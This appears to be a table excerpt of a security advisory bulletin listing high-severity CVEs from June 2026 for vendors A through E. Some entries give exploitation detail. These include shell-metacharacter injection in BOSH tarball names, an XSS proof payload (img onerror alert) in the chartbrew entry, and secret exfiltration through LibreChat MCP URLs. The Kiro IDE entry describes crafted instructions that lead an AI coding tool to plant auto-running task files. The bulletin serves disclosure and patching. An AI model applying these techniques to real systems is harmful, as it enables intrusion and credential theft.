| AWS--AWS Advanced JDBC Wrapper | An untrusted search path issue in the GlobalDatabasePlugin in the AWS Advanced JDBC Wrapper for Amazon Aurora PostgreSQL will allow a remote authenticated low-privilege actor to escalate privileges to those of another Amazon RDS user, including rds_superuser, via a crafted function created by the actor that runs when that user connects to the cluster through an affected wrapper. To remediate this issue, users should upgrade to AWS Advanced JDBC Wrapper version 4.0.1. | 2026-06-05 | 8 | CVE-2026-11400 |
| AWS--Kiro IDE | Insufficient access control restrictions in the file write tool in Amazon Kiro IDE before version 0.11 might allow remote unauthenticated actors to execute arbitrary commands via crafted instructions that cause writes to execution-sensitive paths (such as .vscode/tasks.json), enabling auto-execution on folder open. To remediate this issue, users should upgrade to Kiro IDE version 0.11 or later. | 2026-06-02 | 8.8 | CVE-2026-10591 |
| Axiomthemes--Confidant | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes Confidant allows PHP Local File Inclusion. This issue affects Confidant: from n/a through 1.4. | 2026-06-02 | 8.1 | CVE-2025-53440 |
| Axiomthemes--Crafti | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes Crafti allows PHP Local File Inclusion. This issue affects Crafti: from n/a through 1.12. | 2026-06-02 | 8.1 | CVE-2025-58705 |
| Axiomthemes--Fermentio | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes Fermentio allows PHP Local File Inclusion. This issue affects Fermentio: from n/a through 1.5.0. | 2026-06-02 | 8.1 | CVE-2025-58897 |
| Axiomthemes--Racquet | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes Racquet allows PHP Local File Inclusion. This issue affects Racquet: from n/a through 1.12.0. | 2026-06-02 | 8.1 | CVE-2025-69369 |
| Axiomthemes--Spin | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes Spin allows PHP Local File Inclusion. This issue affects Spin: from n/a through 1.8. | 2026-06-02 | 8.1 | CVE-2025-58707 |
| Ben Balter--WP Document Revisions | Missing Authorization vulnerability in Ben Balter WP Document Revisions allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Document Revisions: from n/a before 4.0.0. | 2026-06-01 | 7.5 | CVE-2026-42677 |
| Boost--Serialization | A flaw has been found in Boost Serialization up to 1.91. The impacted element is an unknown function. This manipulation causes improper validation of specified type of input. It is possible to initiate the attack remotely. The exploit has been published and may be used. The maintainer was notified on Aug 2025 and a disclosure deadline was set for 90 days. The maintainer acknowledged but postponed indefinitely citing time concerns. No patch is currently available and the disclosure deadline has expired. | 2026-06-07 | 7.3 | CVE-2026-11460 |
| browserstack--browserstack-runner | BrowserStack Runner through 0.9.5 contains a remote code execution vulnerability in the /_log HTTP handler that allows unauthenticated network-adjacent attackers to execute arbitrary code by submitting crafted JSON request bodies to the handler, which passes user-supplied data to vm.runInNewContext() combined with eval(). Attackers can escape the Node.js vm sandbox by leveraging a host-context Function reference through util.format to access the host process via this.constructor.constructor, achieving full remote code execution on the underlying system without any authentication. | 2026-06-02 | 8.8 | CVE-2026-49143 |
| care2x--Care2x | Care2x 2.7 contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL commands by manipulating the ck_config cookie parameter. Attackers can inject malicious SQL through the ck_config cookie in multiple endpoints including login.php, indexframe.php, and various module files to extract sensitive database information without authentication. | 2026-06-04 | 8.2 | CVE-2019-25728 |
| Chanjet--CRM | A vulnerability was identified in Chanjet CRM 1.0. This affects an unknown part of the file /tools/jxf_dump_systable.php of the component HTTP GET Request Handler. Such manipulation of the argument gblOrgID leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-07 | 7.3 | CVE-2026-11456 |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In versions 4.9.0 through 5.0.0, an authenticated user with project-editor permissions can store arbitrary HTML/JavaScript in the `ChartDatasetConfig.legend` field. The payload is persisted verbatim in the database, propagated through the Chart.js rendering pipeline, and injected into the tooltip DOM element via an unguarded `innerHTML` assignment in `ChartTooltip.js`. Every unauthenticated viewer of the public dashboard triggers JavaScript execution on page load - no hover interaction is required. Browser-based Playwright verification confirmed `alert('localhost')` fires immediately and `<img src="x" onerror="alert(document.domain)">` is present in the `#chartjs-tooltip` DOM element. Version 5.0.1 contains a fix. | 2026-06-04 | 7.6 | CVE-2026-41518 |
| Chengdu Everbrite Network Technology--BeikeShop | A vulnerability was found in Chengdu Everbrite Network Technology BeikeShop up to 1.6.0.22. This impacts the function callback of the file plugins/Stripe/Controllers/StripeController.php of the component Stripe Plugin. Performing a manipulation of the argument Request results in improper authorization. The attack can be initiated remotely. The exploit has been made public and could be used. The patch is named 6719e0fc690ea0a998452092862e0f0a17c65968. It is suggested to install a patch to address this issue. | 2026-06-07 | 7.3 | CVE-2026-11462 |
| Cisco--Cisco Catalyst SD-WAN Manager | A vulnerability in the CLI of Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage, could allow an authenticated, local attacker to execute arbitrary commands as root by supplying a crafted file to the affected system. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by uploading a crafted file to the affected system. A successful exploit could allow the attacker to perform command injection attacks on an affected system and elevate their privileges as the root user. To exploit this vulnerability, the attacker must have netadmin privileges on the affected system. This would require valid credentials or exploitation of or . Cisco is not aware of successful exploitation by other methods. Cisco has observed limited cases where the exploitation of this bug resulted in a configuration change pushed to edge devices. Cisco recommends that customers upgrade to the fixed software that is documented in the that was published on May 14, 2026, and verify the configuration of the edge devices. | 2026-06-04 | 7.8 | CVE-2026-20245 |
| Cisco--Cisco Unified Communications Manager | A vulnerability in Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an unauthenticated, remote attacker to conduct server-side request forgery (SSRF) attacks through an affected device. This vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to write files to the underlying operating system that could be used later to elevate to root. Note: Cisco has assigned this security advisory a Security Impact Rating (SIR) of Critical rather than High as the score indicates. The reason is that exploitation of this vulnerability could result in an attacker elevating privileges to root. Note: To exploit this vulnerability, the WebDialer service must be enabled. WebDialer is disabled by default. | 2026-06-03 | 8.6 | CVE-2026-20230 |
| Clash Verge Rev--clash-verge-service-ipc | clash-verge-service-ipc before 2.3.0 has a world-reachable IPC endpoint, leading to local privilege escalation. | 2026-06-06 | 8.4 | CVE-2026-26422 |
| cline--cline | Cline is an autonomous coding agent as an SDK, IDE extension, or CLI assistant. In versions 2.13.0 and prior, there is a cross-origin WebSocket hijack vulnerability in Cline Kanban servers. At time of publication, there are no publicly available patches. | 2026-06-01 | 9.6 | CVE-2026-44211 |
| Cloud Foundry Foundation--BOSH | PackagePersister.validate_tgz builds "tar -tf #{tgz} 2>&1" where tgz = File.join(release_dir, 'packages', "#{name}.tgz") and name = package_meta['name'] comes directly from release.MF inside the uploaded tarball. The string is passed to Bosh::Common::Exec.sh, which executes via %x{} - i.e., /bin/sh -c. No Shellwords.escape is applied. The Models::Package Sequel validation (VALID_ID = /^[-0-9A-Za-z_+.]+$/i) would reject the name, but in create_package (lines 74-79) the shell-out in save_package_source_blob runs before package.save, so validation fires too late. Affected versions: - BOSH: all versions prior to v282.1.12 (inclusive); fixed in v282.1.12 or later | 2026-06-04 | 8.2 | CVE-2026-41011 |
| Cloud Foundry Foundation--BOSH | CWE-326 in BOSH allows a local attacker to steal Basic-auth credentials or redirect UAA token requests via MITM. HttpRequestHelper#create_async_endpoint and #send_http_get_request_synchronous hard-code OpenSSL::SSL::VERIFY_NONE, enabling an attacker to intercept traffic between bosh-monitor and the BOSH director or UAA and steal credentials. Affected versions: - BOSH: all versions prior to v282.1.9 (inclusive); fixed in v282.1.9 or later | 2026-06-04 | 8.8 | CVE-2026-41860 |
| Cloud Foundry Foundation--BOSH | A network man-in-the-middle between nats-sync and the BOSH director can steal the director credentials (Basic auth header or UAA client secret) and can tamper with the VM list that is written into the NATS authorization file. Stolen credentials grant administrative director access. UsersSync#bosh_api_response_body builds a Net::HTTP client with verify_mode = OpenSSL::SSL::VERIFY_NONE for every director call (/info, /deployments, /deployments/<name>/vms). Affected versions: - BOSH: all versions prior to v282.1.9 (inclusive); fixed in v282.1.9 or later | 2026-06-04 | 7.8 | CVE-2026-41859 |
| Cloud Foundry Foundation--BOSH Director | ReleaseJob#unpack builds job_dir = File.join(@release_dir, 'jobs', name) and job_tgz = File.join(@release_dir, 'jobs', "#{name}.tgz") where name returns @job_meta['name'], a value taken verbatim from the jobs: array of the attacker-supplied release.MF inside the uploaded tarball. These paths are then interpolated into a shell string: Bosh::Common::Exec.sh("tar -C #{job_dir} -xf #{job_tgz} 2>&1", :on_error => :return). Bosh::Common::Exec.sh executes via %x{#{command}} (bosh-common/lib/bosh/common/exec.rb:53), i.e. /bin/sh -c, so any shell metacharacters in name are interpreted. FileUtils.mkdir_p(job_dir) on line 49 creates the literal directory (no shell) and succeeds even when the name contains $()/;, so execution reaches the sh call. Affected versions: - BOSH Director: all versions prior to v282.1.12 (inclusive); fixed in v282.1.12 or later | 2026-06-04 | 8.2 | CVE-2026-41010 |
| Cloud Foundry Foundation--log-cache_release | Authentication Bypass in cf-auth-proxy in Cloud Foundry Foundation all installations allows an unauthenticated remote attacker to gain read access to every log and metric for every application and platform component via minting a JWT that the cf-auth-proxy accepts as a valid logs.admin token. Affected versions: - log-cache_release: all versions through v3.2.6 (inclusive); fixed in v3.2.7 or later - CF Deployment: all versions through v55.?.0 (inclusive); fixed in v55.?.0 or later (bundles log-cache_release v3.2.7) | 2026-06-01 | 7.5 | CVE-2026-40964 |
| Cloud Foundry Foundation--uaa_release | Cloud Foundry UAA versions v76.12.0 through v78.12.0 are vulnerable to a private key exposure. The server contains a vulnerability where EC (Elliptic Curve) private keys are inadvertently exposed through the public /token_keys endpoint. This endpoint is designed to provide public key material for JWT token verification but incorrectly exposes private key components for EC keys. The vulnerability affects deployments using EC keys for JWT token signing. The vulnerability does not affect RSA key configurations, only deployments using EC keys for JWT signing. Affected versions: - uaa_release: v76.12.0 through v78.12.0 (inclusive); fixed in v78.13.0 or later - CF Deployment: v30.0.0 through v56.0.0 (inclusive); fixed in v56.1.0 or later (bundles uaa_release v78.13.0) | 2026-06-01 | 10 | CVE-2026-40965 |
| CloudburstMC--Network | Cloudburst Network provides network components used within Cloudburst projects. A vulnerability in versions prior to `1.0.0.CR3-20260417.085727-30` impacts publicly accessible software depending on the affected versions of Network and allows an attacker to exploit a vulnerability in Network to stall the netty event loop, rendering it inoperable. All consumers of the library should upgrade to at least version `1.0.0.CR3-20260417.085727-30`. There are no known workarounds beyond updating the library. | 2026-06-05 | 7.5 | CVE-2026-45290 |
| CloudburstMC--Network | Cloudburst Network provides network components used within Cloudburst projects. A vulnerability in versions prior to `1.0.0.CR3-20260418.124334-32` impacts publicly accessible software depending on the affected versions of Network and allows an attacker to exploit a bug in Network to close the parent netty channel, rendering it inoperable. All consumers of the library should upgrade to at least version `1.0.0.CR3-20260418.124334-32`. There are no known workarounds beyond updating the library. | 2026-06-05 | 7.5 | CVE-2026-45291 |
| CloudPirates-io--helm-charts | CloudPirates Open Source Helm Charts is a collection of Helm charts. Prior to commit fcf9302, a GitHub Actions workflow (pull-request.yaml) executes attacker-controlled code from fork pull requests in a privileged context, exposing repository secrets including Docker Hub credentials and tokens without requiring maintainer approval. This issue has been patched via commit fcf9302. | 2026-06-01 | 10 | CVE-2026-45131 |
| CloudPirates-io--helm-charts | CloudPirates Open Source Helm Charts is a collection of Helm charts. Prior to commit fcf9302, a GitHub Actions workflow (generate-schema.yaml) exposes sensitive credentials (Personal Access Token and SSH signing key) to fork-controlled code due to unsafe checkout and credential handling practices. This issue has been patched via commit fcf9302. | 2026-06-01 | 10 | CVE-2026-45132 |
| Code Supply Co.--Blueprint | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Code Supply Co. Blueprint allows PHP Local File Inclusion. This issue affects Blueprint: from n/a before 1.1.5. | 2026-06-02 | 8.1 | CVE-2026-39552 |
| code-projects--Hotel and Tourism Reservation System | A vulnerability was identified in code-projects Hotel and Tourism Reservation System 1.0. This issue affects the function password_verify of the file /admin/login.php of the component Admin Login. Such manipulation of the argument Password leads to improper authentication. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2026-06-01 | 7.3 | CVE-2026-10288 |
| code-projects--Hotel and Tourism Reservation System | A weakness has been identified in code-projects Hotel and Tourism Reservation System 1.0. The affected element is an unknown function of the file tour.php of the component GET Parameter Handler. Executing a manipulation of the argument tour can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-01 | 7.3 | CVE-2026-10290 |
| code-projects--Hotel and Tourism Reservation System | A vulnerability has been found in code-projects Hotel and Tourism Reservation System 1.0. This affects an unknown function of the file /details.php. Such manipulation of the argument room leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2026-06-05 | 7.3 | CVE-2026-11342 |
| code-projects--Online Hospital Management System | A flaw has been found in code-projects Online Hospital Management System 1.php. This impacts the function login_user of the file login_1.php. Executing a manipulation of the argument Username can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used. | 2026-06-01 | 7.3 | CVE-2026-10208 |
| code-projects--Real State Services | A vulnerability has been found in code-projects Real State Services 1.0. This impacts an unknown function of the file /loginuser.php of the component Login. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2026-06-01 | 7.3 | CVE-2026-10262 |
| code-projects--Smart Parking System | A security vulnerability has been detected in code-projects Smart Parking System 1.0. Affected is an unknown function of the component Admin Endpoint. Such manipulation leads to missing authentication. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. Multiple endpoints are affected. | 2026-06-01 | 7.3 | CVE-2026-10243 |
| code-projects--Student Admission System | A flaw has been found in code-projects Student Admission System 1.0. Affected is an unknown function of the file /index.php. This manipulation of the argument eid/did causes sql injection. The attack is possible to be carried out remotely. The exploit has been published and may be used. | 2026-06-02 | 7.3 | CVE-2026-10620 |
| code-projects--Vehicle Management System | A vulnerability was found in code-projects Vehicle Management System 1.0. This impacts an unknown function of the file newdriver.php of the component New Driver Registration Form. Performing a manipulation of the argument photo results in unrestricted upload. The attack may be initiated remotely. The exploit has been made public and could be used. | 2026-06-05 | 7.3 | CVE-2026-11344 |
| CodeAstro--Online Job Portal | A vulnerability was detected in CodeAstro Online Job Portal 1.0. The impacted element is an unknown function of the file /admin/jobs-admins/delete-jobs.php. Performing a manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2026-06-01 | 7.3 | CVE-2026-10260 |
| CodeAstro--Online Job Portal | A flaw has been found in CodeAstro Online Job Portal 1.0. This affects an unknown function of the file /users/application_status.php. Executing a manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2026-06-01 | 7.3 | CVE-2026-10261 |
| codepress--Admin Columns | The Admin Columns plugin for WordPress is vulnerable to PHP Object Injection leading to Remote Code Execution in versions up to and including 7.0.18. This is due to the use of `unserialize()` without an `allowed_classes` restriction in the `IdsToCollection::get_ids_from_string()` function, which processes attacker-controlled post meta values without proper validation. This makes it possible for authenticated attackers with Contributor-level access and above to inject a serialized PHP object into a post's custom meta field and trigger arbitrary code execution by exploiting a bundled POP gadget chain, resulting in remote code execution as the web server user. | 2026-06-05 | 8.8 | CVE-2026-7654 |
| Comodo--Comodo Internet Security | Comodo Internet Security's firewall driver Inspect.sys contains an integer underflow in its IPv6 packet parser. The parser decrements an unsigned 64-bit payload-length value (taken from the IPv6 fixed header's payload length field) by the size of each IPv6 extension header without validating it, so a packet whose declared payload length is smaller than the sum of its extension-header lengths underflows the value to a near-maximal 64-bit integer. Because IPv6 parsing occurs before firewall rule enforcement, a remote, unauthenticated attacker can send a single crafted IPv6 packet - even to a host with all ports blocked - to trigger an out-of-bounds read (and, on a separate code path, an oversized memcpy) in the Windows kernel at DISPATCH_LEVEL, crashing the system (BSOD). | 2026-06-07 | 7.5 | CVE-2026-49494 |
| coreshop--CoreShop | CoreShop is a Pimcore enhanced eCommerce solution. In versions 5.0.1 through 5.1.0-beta.1,, the GitHub Actions workflow (`.github/workflows/static.yml`) uses the `pull_request_target` trigger but dangerously checks out the unverified code from the pull request head (`ref: ${{ github.event.pull_request.head.ref }}`). Subsequently, it executes a script (`bin/console`) from this untrusted checkout. This allows any external attacker to achieve Remote Code Execution (RCE) on the GitHub Actions runner simply by submitting a malicious Pull Request. Also known as a "Pwn Request" vulnerability. As of time of publication, `pull_request_target` is still in the file. | 2026-06-04 | 8.2 | CVE-2026-41249 |
| crmeb--crmeb_java | A vulnerability was found in crmeb crmeb_java 1.4. Affected is the function RestTemplate.getForEntity of the file crmeb-common/src/main/java/com/zbkj/common/utils/RestTemplateUtil.java of the component base64 Qrcode Endpoint. The manipulation of the argument url results in server-side request forgery. The attack can be executed remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-03 | 7.3 | CVE-2026-10771 |
| D-Link--DI-7001 MINI | A vulnerability was detected in D-Link DI-7001 MINI up to 19.09.19A1. Impacted is the function sprintf of the file /httpd_debug.asp of the component API. The manipulation of the argument Time results in stack-based buffer overflow. The attack may be performed from remote. The exploit is now public and may be used. | 2026-06-01 | 8.8 | CVE-2026-10270 |
| D-Link--DI-8400 | A vulnerability was detected in D-Link DI-8400 up to 16.07.26A1. This affects an unknown function of the file /dbsrv.asp. Performing a manipulation of the argument str results in stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used. The initial researcher advisory mentions contradicting parameter names to be affected. | 2026-06-01 | 8.8 | CVE-2026-10206 |
| danny-avila--LibreChat | LibreChat is an enhanced ChatGPT clone that supports multiple AI providers. In versions up to and including 0.8.3, the Model Context Protocol (MCP) server integration resolves ${VAR} placeholders against the server's process.env during Zod schema validation of user-supplied MCP server URLs. Any authenticated user can create a malicious MCP server configuration with a URL pointing to an attacker-controlled domain containing environment variable references, causing the LibreChat server to connect to the attacker's server and transmit critical secrets such as CREDS_KEY, CREDS_IV, JWT_SECRET, and MONGO_URI in the request URL. This enables full compromise of the installation's cryptographic materials and database credentials without requiring administrative privileges. This is patched in version 0.8.4-rc1. | 2026-06-02 | 9.6 | CVE-2026-32625 |
| danny-avila--LibreChat | LibreChat is an enhanced ChatGPT clone that supports multiple AI providers. In versions up to and including 0.7.6, an Insecure Direct Object Reference (IDOR) vulnerability exists in the API keys management endpoint (PUT /api/keys). Due to the use of the JavaScript object spread operator after setting the authenticated user's ID, any authenticated user can inject a userId parameter in the request body to overwrite any other user's API keys (e.g., OpenAI, Anthropic, Azure). This allows an attacker to replace a victim's API key configuration, potentially routing the victim's conversations through attacker-controlled keys or denying service by providing invalid keys. This is patched in version 0.8.3-rc1. | 2026-06-02 | 7.1 | CVE-2026-31942 |
| Dassault Systmes--DELMIA Service Process Engineer | A Stored Cross-site Scripting (XSS) vulnerability affecting Process Experience Studio in DELMIA Service Process Engineer from Release 3DEXPERIENCE R2024x through Release 3DEXPERIENCE R2026x could allow an attacker to execute arbitrary script code in user's browser session. | 2026-06-01 | 8.7 | CVE-2026-9024 |
| Dassault Systmes--Teamwork Cloud - Standard Edition | A Deserialization of Untrusted Data vulnerability affecting Teamwork Cloud from No Magic Release 2022x through No Magic Release 2026x and Magic Collaboration Studio from CATIA Magic Release 2022x through CATIA Magic Release 2026x could lead to an unauthenticated remote code execution. | 2026-06-01 | 9.8 | CVE-2026-7858 |
| DatanoiseTV--tinyice | TinyIce is a streaming server for audio and video. In versions 0.8.95 through 2.4.1, missing authentication on WebRTC ingest endpoint allows unauthenticated stream injection. Version 2.5.0 fixes the issue by requiring either HTTP Basic auth or a `?password=` query parameter, comparing the supplied password against the per-mount source password (or the `default_source_password` fallback) using bcrypt, hooking into the existing brute-force IP rate-limiter (5 failed attempts per IP within 15 minutes triggers a lockout), and rejecting requests for mounts in `disabled_mounts`. The same release also tightens an adjacent endpoint, `POST /admin/golive/chunk`, which previously required session authentication but did not verify the session user's per-mount access nor check the CSRF token. | 2026-06-05 | 8.2 | CVE-2026-45327 |
| davidanderson--All-In-One Security (AIOS) Security and Firewall | The All-In-One Security (AIOS) - Security and Firewall plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to and including 5.4.7. This is due to insufficient input sanitization in the get_rest_route() function and missing output escaping in the column_default() method of the debug log list table. When the 'Disable REST API for non-logged in users' feature (aiowps_disallow_unauthorized_rest_requests) is enabled alongside debug logging (aiowps_enable_debug), an unauthenticated attacker can embed arbitrary HTML or JavaScript in the REST request path. The path is retrieved via urldecode($_SERVER['REQUEST_URI']), which decodes URL-encoded payloads into literal HTML characters. This decoded, unsanitized value is concatenated directly into a debug log message and stored in the database. When an administrator navigates to the AIOS Dashboard Debug Logs page, the column_default() method returns the raw database value without escaping, and the parent list table echoes it directly, causing JavaScript execution in the administrator's browser session. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute when an administrator views the debug log page, enabling nonce theft, privileged AJAX/REST actions, and potential full site compromise. | 2026-06-06 | 7.2 | CVE-2026-8438 |
| DedeCMS--DedeCMS | A vulnerability was determined in DedeCMS 5.7.88. The affected element is the function TrimMsg of the file /plus/feedback.php of the component Feedback Handler. Executing a manipulation of the argument msg can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-02 | 7.3 | CVE-2026-10606 |
| DedeCMS--DedeCMS | A vulnerability was identified in DedeCMS 5.7.88. The impacted element is the function dede_htmlspecialchars of the file /plus/flink.php. The manipulation of the argument msg leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-06-02 | 7.3 | CVE-2026-10607 |
| DedeCMS--DedeCMS | A security flaw has been discovered in DedeCMS 5.7.88. This affects the function RemoveXSS of the file /plus/carbuyaction.php. The manipulation of the argument postname/des results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-02 | 7.3 | CVE-2026-10608 |
| defenseunicorns--uds-identity-config | UDS Identity Config builds the Keycloak configuration image (realm, plugins, theme, truststore, JARs) consumed by UDS Core's Identity deployment. In versions 0.11.0 through 0.26.0, a logic error in the `client-kubernetes-secret` Keycloak client authenticator (shipped by `uds-identity-config` and consumed by UDS Core) causes the submitted `client_secret` to be overwritten with the mounted Kubernetes secret before comparison. An attacker who can reach the Keycloak token endpoint and knows a `client_id` using this authenticator can authenticate as that client with any `client_secret` value and obtain OAuth2 tokens scoped to the client's service account. In the case of the `uds-operator` client this token can be used to registry/modify other clients. Version 0.26.1 patches the issue. | 2026-06-05 | 10 | CVE-2026-46389 |
| Dell--BSAFE SSL-J | Dell BSAFE SSL-J contains an allocation of resources without limits or throttling vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to a Denial of Service (DoS). | 2026-06-04 | 7.5 | CVE-2025-46638 |
| Dell--ThinOS 10 | Dell ThinOS 10, versions prior to ThinOS10 2602_10.0765, contain an Improper Access Control vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Privilege Escalation. | 2026-06-02 | 7.8 | CVE-2026-40715 |
| Drger--CC-Vision Basic | Dräger CC-Vision Basic before 7.5.3 and Dräger CC-Vision E-Cal before 7.2.5.0 contain an out-of-bounds write vulnerability when loading .gdt files. A crafted .gdt file can trigger a buffer overflow during file parsing, allowing an attacker to crash the application or execute malicious code on the underlying system. | 2026-06-02 | 8.2 | CVE-2021-4478 |
| Drger--Core | Dräger Core 1.0.5 and Dräger M540 Converter Service 1.0.9 contain a denial of service vulnerability that allows network-adjacent attackers to trigger high CPU load by sending specially crafted, unencrypted SDC messages during the discovery process. Attackers with access to the hospital network can send malformed SDC packets to exhaust CPU resources in the affected process, causing further SDC messages to no longer be processed. | 2026-06-02 | 7.5 | CVE-2024-14036 |
| Drger--Infinity Acute Care System | Dräger Infinity Acute Care System and Standalone Infinity M540 patient monitors running software versions VG4.1.1, VG4.0.3, and lower contain network message handling vulnerabilities that allow network-adjacent attackers to spoof or tamper with data and cause denial-of-service conditions. Attackers with access to an enabled Infinity network port or physical proximity to a wireless access point can modify device settings such as alarm states or alarm limits, and overwhelm the system with incoming data causing the device to reboot and lose network functionality. | 2026-06-02 | 8.6 | CVE-2019-25719 |
| Drger--Infinity Acute Care System | Dräger Infinity Acute Care System and Standalone Infinity M540 patient monitors versions VG4.1.1, VG4.0.3, and lower (with VG4.2 partially affected) contain a network message handling vulnerability that allows remote attackers to inject spoofed or tampered data and cause denial-of-service conditions. Attackers can compromise network communications to modify device settings such as alarm states or alarm limits, or overwhelm the system with excessive network traffic causing the Cockpit or M540 to reboot and lose network functionality. | 2026-06-02 | 8.6 | CVE-2022-4992 |
| Drger--Infinity Explorer C700 | Dräger Infinity Explorer C700 contains a privilege escalation vulnerability that allows attackers to break out of kiosk mode and access the underlying operating system through a specific dialog interaction. Attackers can exploit this kiosk escape to take control of the operating system and cause the device to display incorrect or no information from the connected Delta Family patient monitor. | 2026-06-01 | 8.4 | CVE-2019-25718 |
| Drger--Protector Software | Dräger Protector Software prior to version 6.4.2 contains a local privilege escalation vulnerability due to insecure file system permissions that allows local attackers to execute arbitrary code with elevated privileges. Attackers can replace binaries or loaded modules on the host system to execute code with NT SYSTEM privileges. | 2026-06-02 | 8.2 | CVE-2021-4480 |
| Drger--Protector Software | Dräger Protector Software prior to version 6.4.2 contains a local privilege escalation vulnerability due to insecure file system permissions that allows local attackers to execute arbitrary code with elevated privileges. Attackers can replace binaries or loaded modules on the host system to execute code with NT SYSTEM privileges. | 2026-06-02 | 8.2 | CVE-2021-4481 |
| Drger--SC 6002XL | Dräger SC Monitoring devices (SC 6002XL, SC 6802XL, SC 7000, SC 8000, SC 9000 XL) contain hard-coded plaintext credentials in source code and a denial-of-service vulnerability that allows local and remote attackers to compromise device integrity across all software versions. A local attacker with direct device access can use the hard-coded credentials to access service and clinical accounts and alter device configuration, while a remote attacker can send malformed network packets to cause repeated device reboots, ultimately resulting in loss of network connectivity and disruption of patient monitoring. | 2026-06-02 | 7.6 | CVE-2019-25722 |
| DTS Electronics Industry and Trade Ltd. Co.--Redline WR3200 | Improper Authentication, Missing authentication for critical function, Weak Authentication vulnerability in DTS Electronics Industry and Trade Ltd. Co. Redline WR3200 allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Redline WR3200: from 7.1.3 before 7.1.8. | 2026-06-05 | 9.8 | CVE-2026-6274 |
| E2Pdf.com--e2pdf | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in E2Pdf.Com e2pdf allows Reflected XSS. This issue affects e2pdf: from n/a through 1.32.14. | 2026-06-01 | 7.1 | CVE-2026-42681 |
| e4jvikwp--VikBooking Hotel Booking Engine & PMS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e4jvikwp VikBooking Hotel Booking Engine & PMS allows DOM-Based XSS. This issue affects VikBooking Hotel Booking Engine & PMS: from n/a through 1.8.8. | 2026-06-01 | 7.1 | CVE-2026-42683 |
| ealpha072--Student-Management-System | A vulnerability was identified in ealpha072 Student-Management-System up to 01451bd7a2f58cdda07bd0b86e3967582e3ecd08. Affected by this issue is some unknown functionality of the file admin/config.php of the component Administrative Backend. Such manipulation leads to improper authentication. The attack may be performed from remote. The exploit is publicly available and might be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-03 | 7.3 | CVE-2026-10777 |
| eitube--EI-Tube | PHP EI-Tube Script 3 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the search parameter. Attackers can send GET requests to the search endpoint with crafted SQL payloads in the query parameter to extract sensitive database information including usernames, passwords, and version details. | 2026-06-04 | 8.2 | CVE-2019-25732 |
| Elated-Themes--Aperitif | Deserialization of Untrusted Data vulnerability in Elated-Themes Aperitif allows Object Injection. This issue affects Aperitif: from n/a through 1.6. | 2026-06-02 | 8.1 | CVE-2026-39550 |
| Elated-Themes--Askka | Deserialization of Untrusted Data vulnerability in Elated-Themes Askka allows Object Injection. This issue affects Askka: from n/a through 1.3.1. | 2026-06-02 | 8.1 | CVE-2026-39555 |
| Elated-Themes--Tbel | Deserialization of Untrusted Data vulnerability in Elated-Themes Töbel allows Object Injection. This issue affects Töbel: from n/a through 1.8.1. | 2026-06-02 | 8.1 | CVE-2026-39551 |
| eliekhoury--WP AutoSuggest | WP AutoSuggest 0.24 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the wpas_keys parameter. Attackers can send GET requests to autosuggest.php with crafted wpas_keys values to extract sensitive database information from WordPress posts and other tables. | 2026-06-01 | 8.2 | CVE-2018-25434 |
| Enderfga--claw-orchestrator | A weakness has been identified in Enderfga claw-orchestrator up to 3.5.5. This affects the function EmbeddedServer of the file src/embedded-server.ts of the component API Endpoint. This manipulation causes missing authentication. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. Upgrading to version 3.5.6 mitigates this issue. Patch name: d0b02a800aa0689d9428cc4cc170e0b6589fb2c3. The affected component should be upgraded. | 2026-06-01 | 7.3 | CVE-2026-10281 |
